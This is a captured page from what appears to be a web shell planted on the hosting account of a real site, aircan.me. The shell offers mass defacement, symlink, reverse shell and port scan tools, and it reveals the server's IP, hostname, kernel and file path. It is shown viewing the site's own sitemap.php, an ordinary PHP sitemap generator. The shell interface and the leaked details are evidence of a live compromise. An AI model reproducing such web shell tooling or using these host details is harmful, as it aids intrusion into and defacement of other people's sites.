Tul xxx Tul
User / IP
:
216.73.216.227
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
Viewing: sitemap.php
<?php require_once __DIR__ . '/config/config.php'; require_once __DIR__ . '/app/core/Database.php'; require_once __DIR__ . '/app/core/Model.php'; require_once __DIR__ . '/app/models/Ajuste.php'; function buildSitemapBaseUrl(): string { if (defined('SITE_URL') && trim((string) SITE_URL) !== '') { return rtrim((string) SITE_URL, '/'); } $https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || (($_SERVER['SERVER_PORT'] ?? null) == 443); $scheme = $https ? 'https' : 'http'; $host = $_SERVER['HTTP_HOST'] ?? 'localhost'; return $scheme . '://' . $host . rtrim(BASE_URL, '/'); } $baseUrl = buildSitemapBaseUrl(); $homeUrl = rtrim($baseUrl, '/') . '/'; $urls = [ ['loc' => $homeUrl, 'priority' => '1.0', 'changefreq' => 'weekly'], ['loc' => $homeUrl . '#about', 'priority' => '0.9', 'changefreq' => 'monthly'], ['loc' => $homeUrl . '#services', 'priority' => '0.9', 'changefreq' => 'weekly'], ['loc' => $homeUrl . '#clients', 'priority' => '0.8', 'changefreq' => 'weekly'], ['loc' => $homeUrl . '#clientes-satisfechos', 'priority' => '0.7', 'changefreq' => 'monthly'], ['loc' => $homeUrl . '#team', 'priority' => '0.7', 'changefreq' => 'monthly'], ['loc' => $homeUrl . '#payment-methods', 'priority' => '0.7', 'changefreq' => 'monthly'], ['loc' => $homeUrl . '#contact', 'priority' => '0.9', 'changefreq' => 'weekly'], ]; $lastmod = date('c'); header('Content-Type: application/xml; charset=UTF-8'); echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"; ?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <?php foreach ($urls as $url): ?> <url> <loc><?= htmlspecialchars($url['loc'], ENT_XML1) ?></loc> <lastmod><?= htmlspecialchars($lastmod, ENT_XML1) ?></lastmod> <changefreq><?= htmlspecialchars($url['changefreq'], ENT_XML1) ?></changefreq> <priority><?= htmlspecialchars($url['priority'], ENT_XML1) ?></priority> </url> <?php endforeach; ?> </urlset>
Coded With 💗 by
0x6ick